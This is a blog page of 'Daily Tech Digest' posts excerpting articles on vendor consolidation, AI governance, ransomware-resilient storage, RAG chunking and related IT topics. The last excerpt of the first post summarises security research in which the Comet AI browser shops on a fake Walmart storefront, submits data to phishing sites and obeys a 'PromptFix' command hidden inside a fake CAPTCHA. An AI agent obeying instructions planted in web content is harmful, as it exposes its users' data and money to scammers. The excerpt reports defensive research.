Showing posts with label vendor management. Show all posts
Showing posts with label vendor management. Show all posts

Daily Tech Digest - August 26, 2025


Quote for the day:

“When we give ourselves permission to fail, we, at the same time, give ourselves permission to excel.” -- Eloise Ristad


6 tips for consolidating your vendor portfolio without killing operations

Behind every sprawling vendor relationship is a series of small extensions that compound over time, creating complex entanglements. To improve flexibility when reviewing partners, Dovico is wary of vendor entanglements that complicate the ability to retire suppliers. Her aim is to clearly define the service required and the vendor’s capabilities. “You’ve got to be conscious of not muddying how you feel about the performance of one vendor, or your relationship with them. You need to have some competitive tension and align core competencies with your problem space,” she says. Klein prefers to adopt a cross-functional approach with finance and engineering input to identify redundancies and sprawl. Engineers with industry knowledge cross-reference vendor services, while IT checks against industry benchmarks, such as Gartner’s Magic Quadrant, to identify vendors providing similar services or tools. ... Vendor sprawl also lurks in the blind spot of cloud-based services that can be adopted without IT oversight, fueling shadow purchasing habits. “With the proliferation of SaaS and cloud models, departments can now make a few phone calls or sign up online to get applications installed or services procured,” says Klein. This shadow IT ecosystem increases security risks and vendor entanglement, undermining consolidation efforts. This needs to be tackled through changes to IT governance.


Should I stay or should I go? Rethinking IT support contracts before auto-renewal bites

Contract inertia, which is the tendency to stick with what you know, even when it may no longer be the best option, is a common phenomenon in business technology. There are several reasons for it, such as familiarity with an existing provider, fear of disruption, the administrative effort involved in reviewing and comparing alternatives, and sometimes just a simple lack of awareness that the renewal date is approaching. The problem is that inertia can quietly erode value. As organisations grow, shift priorities or adopt new technologies, the IT support they once chose may no longer be fit for purpose. ... A proactive approach begins with accountability. IT leaders need to know what their current provider delivers and how they are being used by the company. Are remote software tools performing as expected? Are updates, patches and monitoring processes being applied consistently across all platforms? Are issues being resolved efficiently by our internal IT team, or are inefficiencies building up? Is this the correct set-up and structure for our business, or could we be making better use of existing internal capacity, by leveraging better remote management tools? Gathering this information allows organisations to have an honest conversation with their provider (and themselves) about whether the contract still aligns with their objectives.


AI Data Security: Core Concepts, Risks, and Proven Practices

Although AI makes and fortifies a lot of our modern defenses, once you bring AI into the mix, the risks evolve too. Data security (and cybersecurity in general) has always worked like that. The security team gets a new tool, and eventually, the bad guys get one too. It’s a constant game of catch-up, and AI doesn’t change that dynamic. ... One of the simplest ways to strengthen AI data security is to control who can access what, early and tightly. That means setting clear roles, strong authentication, and removing access that people don’t need. No shared passwords. No default admin accounts. No “just for testing” tokens sitting around with full privileges. ... What your model learns is only as good (and safe) as the data you feed it. If the training pipeline isn’t secure, everything downstream is at risk. That includes the model’s behavior, accuracy, and resilience against manipulation. Always vet your data sources. Don’t rely on third-party datasets without checking them for quality, bias, or signs of tampering. ... A core principle of data protection, baked into laws like GDPR, is data minimization: only collect what you need, and only keep it for as long as you actually need it. In real terms, that means cutting down on excess data that serves no clear purpose. Put real policies in place. Schedule regular reviews. Archive or delete datasets that are no longer relevant. 


Morgan Stanley Open Sources CALM: The Architecture as Code Solution Transforming Enterprise DevOps

CALM enables software architects to define, validate, and visualize system architectures in a standardized, machine-readable format, bridging the gap between architectural intent and implementation. Built on a JSON Meta Schema, CALM transforms architectural designs into executable specifications that both humans and machines can understand. ... The framework structures architecture into three primary components: nodes, relationships, and metadata. This modular approach allows architects to model everything from high-level system overviews to detailed microservices architectures. ... CALM’s true power emerges in its seamless integration with modern DevOps workflows. The framework treats architectural definitions like any other code asset, version-controlled, testable, and automatable. Teams can validate architectural compliance in their CI/CD pipelines, catching design issues before they reach production. The CALM CLI provides immediate feedback on architectural decisions, enabling real-time validation during development. This shifts compliance left in the development lifecycle, transforming potential deployment roadblocks into preventable design issues. Key benefits for DevOps teams include machine-readable architecture definitions that eliminate manual interpretation errors, version control for architectural changes that provides clear change history, and real-time feedback on compliance violations that prevent downstream issues.


Shadow AI is surging — getting AI adoption right is your best defense

Despite the clarity of this progression, many organizations struggle to begin. One of the most common reasons is poor platform selection. Either no tool is made available, or the wrong class of tool is introduced. Sometimes what is offered is too narrow, designed for one function or team. Sometimes it is too technical, requiring configuration or training that most users aren’t prepared for. In other cases, the tool is so heavily restricted that users cannot complete meaningful work. Any of these mistakes can derail adoption. A tool that is not trusted or useful will not be used. And without usage, there is no feedback, value, or justification for scale. ... The best entry point is a general-purpose AI assistant designed for enterprise use. It must be simple to access, require no setup, and provide immediate value across a range of roles. It must also meet enterprise requirements for data security, identity management, policy enforcement, and model transparency. This is not a niche solution. It is a foundation layer. It should allow employees to experiment, complete tasks, and build fluency in a way that is observable, governable, and safe. Several platforms meet these needs. ChatGPT Enterprise provides a secure, hosted version of GPT-5 with zero data retention, administrative oversight, and SSO integration. It is simple to deploy and easy to use. =


AI and the impact on our skills – the Precautionary Principle must apply

There is much public comment about AI replacing jobs or specific tasks within roles, and this is often cited as a source of productivity improvement. Often we hear about how junior legal professionals can be easily replaced since much of their work is related to the production of standard contracts and other documents, and these tasks can be performed by LLMs. We hear much of the same narrative from the accounting and consulting worlds. ... The greatest learning experiences come from making mistakes. Problem-solving skills come from experience. Intuition is a skill that is developed from repeatedly working in real-world environments. AI systems do make mistakes and these can be caught and corrected by a human, but it is not the same as the human making the mistake. Correcting the mistakes made by AI systems is in itself a skill, but a different one. ... In a rapidly evolving world in which AI has the potential to play a major role, it is appropriate that we apply the Precautionary Principle in determining how to automate with AI. The scientific evidence of the impact of AI-enabled automation is still incomplete, but more is being learned every day. However, skill loss is a serious, and possibly irreversible, risk. The integrity of education systems, the reputations of organisations and individuals, and our own ability to trust in complex decision-making processes, are at stake.


Ransomware-Resilient Storage: The New Frontline Defense in a High-Stakes Cyber Battle

The cornerstone of ransomware resilience is immutability: data written to storage cannot be altered or deleted ever. This write-once-read-many capability means backup snapshots or data blobs are locked for prescribed retention periods, impervious to tampering even by attackers or system administrators with elevated privileges. Hardware and software enforce this immutability by preventing any writes or deletes on designated volumes, snapshots, or objects once committed, creating a "logical air gap" of protection without the need for physical media isolation. ... Moving deeper, efforts are underway to harden storage hardware directly. Technologies such as FlashGuard, explored experimentally by IBM and Intel collaborations, embed rollback capabilities within SSD controllers. By preserving prior versions of data pages on-device, FlashGuard can quickly revert files corrupted or encrypted by ransomware without network or host dependency. ... Though not widespread in production, these capabilities signal a future where storage devices autonomously resist ransomware impact, a powerful complement to immutable snapshotting. While these cutting-edge hardware-level protections offer rapid recovery and autonomous resilience, organizations also consider complementary isolation strategies like air-gapping to create robust multi-layered defense boundaries against ransomware threats.


How an Internal AI Governance Council Drives Responsible Innovation

The efficacy of AI governance hinges on the council’s composition and operational approach. An optimal governance council typically includes cross-functional representation from executive leadership, IT, compliance and legal teams, human resources, product management, and frontline employees. This diversified representation ensures comprehensive coverage of ethical considerations, compliance requirements, and operational realities. Initial steps in operationalizing a council involve creating strong AI usage policies, establishing approved tools, and developing clear monitoring and validation protocols. ... While initial governance frameworks often focus on strict risk management and regulatory compliance, the long-term goal shifts toward empowerment and innovation. Mature governance practices balance caution with enablement, providing organizations with a dynamic, iterative approach to AI implementation. This involves reassessing and adapting governance strategies, aligning them with evolving technologies, organizational objectives, and regulatory expectations. AI’s non-deterministic, probabilistic nature, particularly generative models, necessitates a continuous human oversight component. Effective governance strategies embed this human-in-the-loop approach, ensuring AI enhances decision-making without fully automating critical processes.


The energy sector has no time to wait for the next cyberattack

Recent findings have raised concerns about solar infrastructure. Some Chinese-made solar inverters were found to have built-in communication equipment that isn’t fully explained. In theory, these devices could be triggered remotely to shut down inverters, potentially causing widespread power disruptions. The discovery has raised fears that covert malware may have been installed in critical energy infrastructure across the U.S. and Europe, which could enable remote attacks during conflicts. ... Many OT systems were built decades ago and weren’t designed with cyber threats in mind. They often lack updates, patches, and support, and older software and hardware don’t always work with new security solutions. Upgrading them without disrupting operations is a complex task. OT systems used to be kept separate from the Internet to prevent remote attacks. Now, the push for real-time data, remote monitoring, and automation has connected these systems to IT networks. That makes operations more efficient, but it also gives cybercriminals new ways to exploit weaknesses that were once isolated. Energy companies are cautious about overhauling old systems because it’s expensive and can interrupt service. But keeping legacy systems in play creates security gaps, especially when connected to networks or IoT devices. Protecting these systems while moving to newer, more secure tech takes planning, investment, and IT-OT collaboration.


Agentic AI Browser an Easy Mark for Online Scammers

In an Wednesday blog post, researchers from Guardio wrote that Comet - one of the first AI browsers to reach consumers - clicked through fake storefronts, submitted sensitive data to phishing sites and failed to recognize malicious prompts designed to hijack its behavior. The Tel Aviv-based security firm calls the problem "scamlexity," a messy intersection of human-like automation and old-fashioned social engineering creates "a new, invisible scam surface" that scales to millions of potential victims at once. In a clash between the sophistication of generative models built into browsers and the simplicity of phishing tricks that have trapped users for decades, "even the oldest tricks in the scammer's playbook become more dangerous in the hands of AI browsing." One of the headline features of AI browsers is one-click shopping. Researchers spun up a fake "Walmart" storefront complete with polished design, realistic listings and a seamless checkout flow. ... Rather than fooling a user into downloading malicious code to putatively fix a computer problem - as in ClickFix - a PromptFix attack is a malicious instruction was hidden inside what looks like a CAPTCHA. The AI treated the bogus challenge as routine, obeyed the hidden command and continued execution. AI agents are expected to ingest unstructured logs, alerts or even attacker-generated content during incident response.

Daily Tech Digest - April 03, 2025


Quote for the day:

"The most difficult thing is the decision to act, the rest is merely tenacity." -- Amelia Earhart


Veterans are an obvious fit for cybersecurity, but tailored support ensures they succeed

Both civilian and military leaders have long seen veterans as strong candidates for cybersecurity roles. The National Initiative for Cybersecurity Careers and Studies, part of the US Cybersecurity and Infrastructure Security Agency (CISA), speaks directly to veterans, saying “Your skills and training from the military translate well to a cyber career.” NICCS continues, “Veterans’ backgrounds in managing high-pressure situations, attention to detail, and understanding of secure communications make them particularly well-suited for this career path.” Gretchen Bliss, director of cybersecurity programs at the University of Colorado at Colorado Springs (UCCS), speaks specifically to security execs on the matter: “If I were talking to a CISO, I’d say get your hands on a veteran. They understand the practical application piece, the operational piece, they have hands-on experience. They think things through, they know how to do diagnostics. They already know how to tackle problems.” ... And for veterans who haven’t yet mastered all that, Andrus advises “networking with people who actually do the job you want.” He also advises veterans to learn about the environment at the organization they seek to join, asking themselves whether they’d fit in. And he recommends connecting with others to ease the transition.


The 6 disciplines of strategic thinking

A strategic thinker is not just a good worker who approaches a challenge with the singular aim of resolving the problem in front of them. Rather, a strategic thinker looks at and elevates their entire ecosystem to achieve a robust solution. ... The first discipline is pattern recognition. A foundation of strategic thinking is the ability to evaluate a system, understand how all its pieces move, and derive the patterns they typically form. ... Watkins’s next discipline, and an extension of pattern recognition, is systems analysis. It is easy to get overwhelmed when breaking down the functional elements of a system. A strategic thinker avoids this by creating simplified models of complex patterns and realities. ... Mental agility is Watkins’s third discipline. Because the systems and patterns of any work environment are so dynamic, leaders must be able to change their perspective quickly to match the role they are examining. Systems evolve, people grow, and the larger picture can change suddenly. ... Structured problem-solving is a discipline you and your team can use to address any issue or challenge. The idea of problem-solving is self-explanatory; the essential element is the structure. Developing and defining a structure will ensure that the correct problem is addressed in the most robust way possible.


Why Vendor Relationships Are More Important Than Ever for CIOs

Trust is the necessary foundation, which is built through open communication, solid performance, relevant experience, and proper security credentials and practices. “People buy from people they trust, no matter how digital everything becomes,” says Thompson. “That human connection remains crucial, especially in tech where you're often making huge investments in mission-critical systems.” ... An executive-level technology governance framework helps ensure effective vendor oversight. According to Malhotra, it should consist of five key components, including business relationship management, enterprise technology investment, transformation governance, value capture and having the right culture and change management in place. Beneath the technology governance framework is active vendor governance, which institutionalizes oversight across ten critical areas including performance management, financial management, relationship management, risk management, and issues and escalations. Other considerations include work order management, resource management, contract and compliance, having a balanced scorecard across vendors and principled spend and innovation.


Shadow Testing Superpowers: Four Ways To Bulletproof APIs

API contract testing is perhaps the most immediately valuable application of shadow testing. Traditional contract testing relies on mock services and schema validation, which can miss subtle compatibility issues. Shadow testing takes contract validation to the next level by comparing actual API responses between versions. ... Performance testing is another area where shadow testing shines. Traditional performance testing usually happens late in the development cycle in dedicated environments with synthetic loads that often don’t reflect real-world usage patterns. ... Log analysis is often overlooked in traditional testing approaches, yet logs contain rich information about application behavior. Shadow testing enables sophisticated log comparisons that can surface subtle issues before they manifest as user-facing problems. ... Perhaps the most innovative application of shadow testing is in the security domain. Traditional security testing often happens too late in the development process, after code has already been deployed. Shadow testing enables a true shift left for security by enabling dynamic analysis against real traffic patterns. ... What makes these shadow testing approaches particularly valuable is their inherently low-maintenance nature. 


Rethinking technology and IT's role in the era of agentic AI and digital labor

Rethinking technology and the role of IT will drive a shift from the traditional model to a business technology-focused model. One example will be the shift from one large, dedicated IT team that traditionally handles an organization's technology needs, overseen and directed by the CIO, to more focused IT teams that will perform strategic, high-value activities and help drive technology innovation strategy as Gen AI handles many routine IT tasks. Another shift will be spending and budget allocations. Traditionally, CIOs manage the enterprise IT budget and allocation. In the new model, spending on enterprise-wide IT investments continues to be assessed and guided by the CIO, and some enterprise technology investments are now governed and funded by the business units. ... Today, agentic AI is not just answering questions -- it's creating. Agents take action autonomously. And it's changing everything about how technology-led enterprises must design, deploy, and manage new technologies moving forward. We are building self-driving autonomous businesses using agentic AI where humans and machines work together to deliver customer success. However, giving agency to software or machines to act will require a new currency. Trust is the new currency of AI.


From Chaos to Control: Reducing Disruption Time During Cyber Incidents and Breaches

Cyber disruptions are no longer isolated incidents; they have ripple effects that extend across industries and geographic regions. In 2024, two high-profile events underscored the vulnerabilities in interconnected systems. The CrowdStrike IT outage resulted in widespread airline cancellations, impacting financial markets and customer trust, while the Change Healthcare ransomware attack disrupted claims processing nationwide, costing billions in financial damages. These cases emphasize why resilience professionals must proactively integrate automation and intelligence into their incident response strategies. ... Organizations need structured governance models that define clear responsibilities before, during, and after an incident. AI-driven automation enables proactive incident detection and streamlined responses. Automated alerts, digital action boards, and predefined workflows allow teams to act swiftly and decisively, reducing downtime and minimizing operational losses. Data is the foundation of effective risk and resilience management. When organizations ensure their data is reliable and comprehensive, they gain an integrated view that enhances visibility across business continuity, IT, and security teams. 


What does an AI consultant actually do?

AI consulting involves advising on, designing and implementing artificial intelligence solutions. The spectrum is broad, ranging from process automation using machine learning models to setting up chatbots and performing complex analyses using deep learning methods. However, the definition of AI consulting goes beyond the purely technical perspective. It is an interdisciplinary approach that aligns technological innovation with business requirements. AI consultants are able to design technological solutions that are not only efficient but also make strategic sense. ... All in all, both technical and strategic thinking is required: Unlike some other technology professions, AI consulting not only requires in-depth knowledge of algorithms and data processing, but also strategic and communication skills. AI consultants talk to software development and IT departments as well as to management, product management or employees from the relevant field. They have to explain technical interrelations clearly and comprehensibly so that the company can make decisions based on this knowledge. Since AI technologies are developing rapidly, continuous training is important. Online courses, boot camps and certificates as well as workshops and conferences. 


Building a cybersecurity strategy that survives disruption

The best strategies treat resilience as a core part of business operations, not just a security add-on. “The key to managing resilience is to approach it like an onion,” says James Morris, Chief Executive of The CSBR. “The best strategy is to be effective at managing the perimeter. This approach will allow you to get a level of control on internal and external forces which are key to long-term resilience.” That layered thinking should be matched by clearly defined policies and procedures. “Ensure that your ‘resilience’ strategy and policies are documented in detail,” Morris advises. “This is critical for response planning, but also for any legal issues that may arise. If it’s not documented, it doesn’t happen.” ... Move beyond traditional monitoring by implementing advanced, behaviour-based anomaly detection and AI-driven solutions to identify novel threats. Invest in automation to enhance the efficiency of detection, triage, and initial response tasks, while orchestration platforms enable coordinated workflows across security and IT tools, significantly boosting response agility. ... A good strategy starts with the idea that stuff will break. So you need things like segmentation, backups, and backup plans for your backup plans, along with alternate ways to get back up and running. Fast, reliable recovery is key. Just having backups isn’t enough anymore.


3 key features in Kong AI Gateway 3.10

For teams working with sensitive or regulated data, protecting personally identifiable information (PII) in AI workflows is not optional, it’s essential for proper governance. Developers often use regex libraries or handcrafted filters to redact PII, but these DIY solutions are prone to error, inconsistent enforcement, and missed edge cases. Kong AI Gateway 3.10 introduces out-of-the-box PII sanitization, giving platform teams a reliable, enterprise-grade solution to scrub sensitive information from prompts before they reach the model. And if needed, reinserting sanitized data in the response before it returns to the end user. ... As organizations adopt multiple LLM providers and model types, complexity can grow quickly. Different teams may prefer OpenAI, Claude, or open-source models like Llama or Mistral. Each comes with its own SDKs, APIs, and limitations. Kong AI Gateway 3.10 solves this with universal API support and native SDK integration. Developers can continue using the SDKs they already rely on (e.g., AWS, Azure) while Kong translates requests at the gateway level to interoperate across providers. This eliminates the need for rewriting app logic when switching models and simplifies centralized governance. This latest release also includes cost-based load balancing, enabling Kong to route requests based on token usage and pricing. 


The future of IT operations with Dark NOC

From a Managed Service Provider (MSP) perspective, Dark NOC will shift the way IT operates today by making it more efficient, scalable, and cost-effective. It will replace Traditional NOC’s manual-intensive task of continuous monitoring, diagnosing, and resolving issues across multiple customer environments. ... Another key factor that Dark NOC enables MSPs is scalability. Its analytics and automation capability allows it to manage thousands of endpoints effortlessly without proportionally increasing engineers’ headcount. This enables MSPs to extend their service portfolios, onboard new customers, and increase profit margins while retaining a lean operational model. From a competitive point of view, adopting Dark NOC enables MSPs to differentiate themselves from competitors by offering proactive, AI-driven IT services that minimise downtime, enhance security and maximise performance. Dark NOC helps MSPs provide premium service at affordable price points to customers while making a decent margin internally. ... Cloud infrastructure monitoring & management (Provides real-time cloud resource monitoring and predictive insights). Examples include AWS CloudWatch, Azure Monitor, and Google Cloud Operations Suite.

Daily Tech Digest - December 28, 2024

Forcing the SOC to change its approach to detection

Make no mistake, we are not talking about the application of AI in the usual sense when it comes to threat detection. Up until now, AI has seen Large Language Models (LLMs) used to do little more than summarise findings for reporting purposes in incident response. Instead, we are referring to the application of AI in its truer and broader sense, i.e. via machine learning, agents, graphs, hypergraphs and other approaches – and these promise to make detection both more precise and intelligible. Hypergraphs gives us the power to connect hundreds of observations together to form likely chains of events. ... The end result is that the security analyst is no longer perpetually caught in firefighting mode. Rather than having to respond to hundreds of alerts a day, the analyst can use the hypergraphs and AI to detect and string together long chains of alerts that share commonalities and in so doing gain a complete picture of the threat. Realistically, it’s expected that adopting such an approach should see alert volumes decline by up to 90 per cent. But it doesn’t end there. By applying machine learning to the chains of events it will be possible to prioritise response, identifying which threats require immediate triage. 


Sole Source vs. Single Source Vendor Management

A Sole source is a vendor that provides a specific product or service to your company. This vendor makes a specific widget or service that is custom tailored to your company’s needs. If there is an event at this Sole Source provider, your company can only wait until the event has been resolved. There is no other vendor that can produce your product or service quickly. They are the sole source, on a critical path to your operations. From an oversight and assessment perspective, this can be a difficult relationship to mitigate risks to your company. With sole source companies, we as practitioners must do a deeper dive into these companies from a risk assessment perspective. From a vendor audit perspective, we need to go into more details of how robust their business continuity, disaster recovery, and crisis management programs are. ... Single Source providers are vendors that provide a service or product to your company that is one company that you choose to do business with, but there are other providers that could provide the same product or services. An example of a single source provider is a payment processing company. There are many to choose from, but you chose one specific company to do business with. Moving to a new single source provider can be a daunting task that involves a new RFP process, process integration, assessments of their business continuity program, etc. 


Central Africa needs traction on financial inclusion to advance economic growth

Beyond the infrastructure, financial inclusion would see a leap forward in CEMAC if the right policies and platforms exist. “The number two thing is that you have to have the right policies in place which are going to establish what would constitute acceptable identity authentication for identity transactions. So, be it for onboarding or identity transactions, you have to have a policy. Saying that we’re going to do biometric authentication for every transaction, no matter what value it is and what context it is, doesn’t make any sense,” Atick holds. “You have to have a policy that is basically a risk-based policy. And we have lots of experience in that. Some countries started with their own policies, and over time, they started to understand it. Luckily, there is a lot of knowledge now that we can share on this point. This is why we’re doing the Financial Inclusion Symposium at the ID4Africa Annual General Meeting next year [in Addis Ababa], because these countries are going to share their knowledge and experiences.” “The symposium at the AGM will basically be on digital identity and finance. It’s going to focus on the stages of financial inclusion, and what are the risk-based policies countries must put in place to achieve the desired outcome, which is a low-cost, high-robustness and trustworthy ecosystem that enables anybody to enter the system and to conduct transactions securely.”


2025 Data Outlook: Strategic Insights for the Road Ahead

By embracing localised data processing, companies can turn compliance into an advantage, driving innovations such as data barter markets and sovereignty-specific data products. Data sovereignty isn’t merely a regulatory checkbox—it’s about Citizen Data Rights. With most consumer data being unstructured and often ignored, organisations can no longer afford complacency. Prioritising unstructured data management will be crucial as personal information needs to be identified, cataloged, and protected at a granular level from inception through intelligent, policy-based automation. ... Individuals are gaining more control over their personal information and expect transparency, control, and digital trust from organisations. As a result, businesses will shift to self-service data management, enabling data stewards across departments to actively participate in privacy practices. This evolution moves privacy management out of IT silos, embedding it into daily operations across the organisation. Organisations that embrace this change will implement a “Data Democracy by Design” approach, incorporating self-service privacy dashboards, personalised data management workflows, and Role-Based Access Control (RBAC) for data stewards. 


Defining & Defying Cybersecurity Staff Burnout

According to the van Dam article, burnout happens when an employee buries their experience of chronic stress for years. The people who burn out are often formerly great performers, perfectionists who exhibit perseverance. But if the person perseveres in a situation where they don't have control, they can experience the kind of morale-killing stress that, left unaddressed for months and years, leads to burnout. In such cases, "perseverance is not adaptive anymore and individuals should shift to other coping strategies like asking for social support and reflecting on one's situation and feelings," the article read. ... Employees sometimes scoff at the wellness programs companies put out as an attempt to keep people healthy. "Most 'corporate' solutions — use this app! attend this webinar! — felt juvenile and unhelpful," Eden says. And it does seem like many solutions fall into the same quick-fix category as home improvement hacks or dump dinner recipes. Christina Maslach's scholarly work attributed work stress to six main sources: workload, values, reward, control, fairness, and community. An even quicker assessment is promised by the Matches Measure from Cindy Muir Zapata. 


Revolutionizing Cloud Security for Future Threats

Is it possible that embracing Non-Human Identities can help us bridge the resource gap in cybersecurity? The answer is a definite yes. The cybersecurity field is chronically understaffed and for firms to successfully safeguard their digital assets, they must be equipped to handle an infinite number of parallel tasks. This demands a new breed of solutions such as NHIs and Secrets Security Management that offer automation at a scale hitherto unseen. NHIs have the potential to take over tedious tasks like secret rotation, identity lifecycle management, and security compliance management. By automating these tasks, NHIs free up the cybersecurity workforce to concentrate on more strategic initiatives, thereby improving the overall efficiency of your security operations. Moreover, through AI-enhanced NHI Management platforms, we can provide better insights into system vulnerabilities and usage patterns, considerably improving context-aware security. Can the concept of Non-Human Identities extend its relevance beyond the IT sector? ... From healthcare institutions safeguarding sensitive patient data, financial services firms securing transactional data, travel companies protecting customer data, to DevOps teams looking to maintain the integrity of their codebases, the strategic relevance of NHIs is widespread.


Digital Transformation: Making Information Work for You

Digital transformation is changing the organization from one state to another through the use of electronic devices that leverage information. Oftentimes, this entails process improvement and process reengineering to convert business interactions from human-to-human to human-to-computer-to-human. By introducing the element of the computer into human-to-human transactions, there is a digital breadcrumb left behind. This digital record of the transaction is important in making digital transformations successful and is the key to how analytics can enable more successful digital transformations. In a human-to-human interaction, information is transferred from one party to another, but it generally stops there. With the introduction of the digital element in the middle, the data is captured, stored, and available for analysis, dissemination, and amplification. This is where data analytics shines. If an organization stops with data storage, they are missing the lion’s share of the potential value of a digital transformation initiative. Organizations that focus only on collecting data from all their transactions and sinking this into a data lake often find that their efforts are in vain. They end up with a data swamp where data goes to die and never fully realize its potential value. 


Secure and Simplify SD-Branch Networks

The traditional WAN relies on expensive MPLS connectivity and a hub-and-spoke architecture that backhauls all traffic through the corporate data centre for centralized security checks. This approach creates bottlenecks that interfere with network performance and reliability. In addition to users demanding fast and reliable access to resources, IoT applications need reliable WAN connections to leverage cloud-based management and big data repositories. ... The traditional WAN relies on expensive MPLS connectivity and a hub-and-spoke architecture that backhauls all traffic through the corporate data centre for centralized security checks. This approach creates bottlenecks that interfere with network performance and reliability. In addition to users demanding fast and reliable access to resources, IoT applications need reliable WAN connections to leverage cloud-based management and big data repositories. ... To reduce complexity and appliance sprawl, SD-Branch consolidates networking and security capabilities into a single solution that provides seamless protection of distributed environments. It covers all critical branch edges, from the WAN edge to the branch access layer to a full spectrum of endpoint devices. 


Breaking up is hard to do: Chunking in RAG applications

The most basic is to chunk text into fixed sizes. This works for fairly homogenous datasets that use content of similar formats and sizes, like news articles or blog posts. It’s the cheapest method in terms of the amount of compute you’ll need, but it doesn’t take into account the context of the content that you’re chunking. That might not matter for your use case, but it might end up mattering a lot. You could also use random chunk sizes if your dataset is a non-homogenous collection of multiple document types. This approach can potentially capture a wider variety of semantic contexts and topics without relying on the conventions of any given document type. Random chunks are a gamble, though, as you might end up breaking content across sentences and paragraphs, leading to meaningless chunks of text. For both of these types, you can apply the chunking method over sliding windows; that is, instead of starting new chunks at the end of the previous chunk, new chunks overlap the content of the previous one and contain part of it. This can better capture the context around the edges of each chunk and increase the semantic relevance of your overall system. The tradeoff is that it requires greater storage requirements and can store redundant information.


What is quantum supremacy?

A definitive achievement of quantum supremacy will require either a significant reduction in quantum hardware's error rates or a better theoretical understanding of what kind of noise classical approaches can exploit to help simulate the behavior of error-prone quantum computers, Fefferman said. But this back-and-forth between quantum and classical approaches is helping push the field forwards, he added, creating a virtuous cycle that is helping quantum hardware developers understand where they need to improve. "Because of this cycle, the experiments have improved dramatically," Fefferman said. "And as a theorist coming up with these classical algorithms, I hope that eventually, I'm not able to do it anymore." While it's uncertain whether quantum supremacy has already been reached, it's clear that we are on the cusp of it, Benjamin said. But it's important to remember that reaching this milestone would be a largely academic and symbolic achievement, as the problems being tackled are of no practical use. "We're at that threshold, roughly speaking, but it isn't an interesting threshold, because on the other side of it, nothing magic happens," Benjamin said. ... That's why many in the field are refocusing their efforts on a new goal: demonstrating "quantum utility," or the ability to show a significant speedup over classical computers on a practically useful problem.


Shift left security — Good intentions, poor execution, and ways to fix it

One of the first steps is changing the way security is integrated into development. Instead of focusing on a “gotcha”, after-the-fact approach, we need security to assist us as early as possible in the process: as we write the code. By guiding us as we’re still in ‘work-in-progress’ mode with our code, security can adopt a positive coaching and helping stance, nudging us to correct issues before they become problems and go clutter our backlog. ... The security tools we use need to catch vulnerabilities early enough so that nobody circles back to fix boomerang issues later. Very much in line with my previous point, detecting and fixing vulnerabilities as we code saves time and preserves focus. This also reduces the back-and-forth in peer reviews, making the entire process smoother and more efficient. By embedding security more deeply into the development workflow, we can address security issues without disrupting productivity. ... When it comes to security training, we need a more focused approach. Developers don’t need to become experts in every aspect of code security, but we do need to be equipped with the knowledge that’s directly relevant to the work we’re doing, when we’re doing it — as we code. Instead of broad, one-size-fits-all training programs, let’s focus on addressing specific knowledge gaps we personally have. 



Quote for the day:

“Whenever you see a successful person, you only see the public glories, never the private sacrifices to reach them.” -- Vaibhav Shah

Daily Tech Digest - July 08, 2024

How insurtech startups are addressing the challenges of slow processes in the insurance sector

Even though compliance and regulation are critical for the security of both the insurers and customers, the regulatory process could be quite long. Compliance requirements demand meticulous attention to detail and can significantly prolong the approval process for new products and services. Another factor can be risk aversion. It (risk aversion) within the industry fosters a culture of caution, where insurers are hesitant to embrace change and experiment with new approaches to product development and underwriting. ... One of the solutions for these industrial challenges lies in the collaboration of the insurance sector and the latest technologies. Insurtech solutions offer myriad innovative tools and technologies that promise to streamline product development and automate underwriting processes. One such solution gaining traction is artificial intelligence (AI) and machine learning algorithms, which can analyse vast amounts of data in real time to assess risk and expedite underwriting decisions. 


Transforming Business Practices Through Augmented Intelligence

While AI raises apprehensions about potential job displacement, viewing it solely as a threat overlooks its capacity to enhance human capabilities, as evidenced by historical technological advancements. Training and education play a key role in this process, as AI has become an integral part of our reality and must be harnessed to its full potential. It is essential to align the use of artificial intelligence with the overall strategy of the organization for smooth integration of applications with data, processes, and collaboration between stakeholders. In a landscape where the internet simplifies transactions, software provides tools, and AI leverages data to make informed decisions, training and education become crucial. ... At its core, technology has always revolved around processing data. When viewed through the lens of enterprise architecture, an AI-powered machine learning tool can adeptly craft roadmaps tailored for businesses. Through advanced AI analytics, automation, and recommendation systems, enterprise architecture facilitates more informed and expedited decision-making processes.


Request for proposal vs. request for partner: what works best for you?

An RFProposal is an efficient choice when the nature of the work is standardized, while an RFPartner is the better choice when the buying organization is seeking a strategic partner for the overall best fit to meet its needs. ... When organizations shift to wanting to find a partner with the best possible solution, it’s important to understand the nature of the selection criteria change. With an RFPartner, buyers evaluate suppliers not only based on technical capabilities but also on the best value of the solution. ... “On the surface, an RFPartner sounds like a heavy lift, but we find that the overall time and effort is about the same,” he says. “In an RFProposal, the buyer is spending more time upfront defining the specs and in contentious negotiations. The RFPartner process flips this on its head and creates a more integrated bid solution that generates better solutions, spending more time together with the supplier co-creating, especially if your aim is making the shift to a highly collaborative vested business model to achieve strategic business outcomes.”


If you’re a CISO without D&O insurance, you may need to fight for it

D&O insurance covers the personal liabilities of corporate directors and officers in the event of incidents that lead to financial losses, reputational damage, or legal consequences. Without adequate D&O coverage, CISOs are left vulnerable, highlighting the need for this in an organization’s risk-management strategy. ... Lisa Hall, CISO at privately held Safebase, agrees that CISOs at all companies should be covered under their organizations’ D&O insurance policies, particularly in light of these new regulations. “I do think adding CISOs to D&O insurance will be more and more of a thing, and there is, for sure, more chatter in my CISO groups about how companies are handling this,” she says. “A lot of CISOs are also taking out errors and omissions insurance personally. I have that just for the consulting and advisory work I do.” ... “A lot of CISOs are thinking about this, especially after SolarWinds,” she says. “And if we feel that we’re not 100% protected for any decision we make, and we can be personally liable for a breach or possible incident even if we do the right thing, it’s really pushing CISOs to say, ‘Hey, company, I’ll join if you cover me or give me a different title.’ “


How DORA is fortifying Europe’s financial future with a new take on operational resilience

For DORA, digital operational resilience very simply means “the ability of a financial entity to build, assure, and review its operational integrity and reliability by ensuring, either directly or indirectly through the use of services provided by ICT third-party service providers, the full range of ICT-related capabilities needed to address the security of the network and information systems which a financial entity uses, and which support the continued provision of financial services and their quality, including throughout disruptions”. Developing on this statement in a conversation with FinTech Futures, Simon Treacy, a senior associate at global law firm Linklaters, describes DORA as “a very prescriptive framework for financial entities, primarily to build and improve the way that they manage ICT risk”. “It applies very broadly across the EU regulated financial sector,” he continues, “and really part of its aim is to harmonise standards so that the smallest payments firm is subject to the same rules for operational resilience as the biggest banks and insurers.”


Data Sprawl: Continuing Problem for the Enterprise or an Untapped Opportunity?

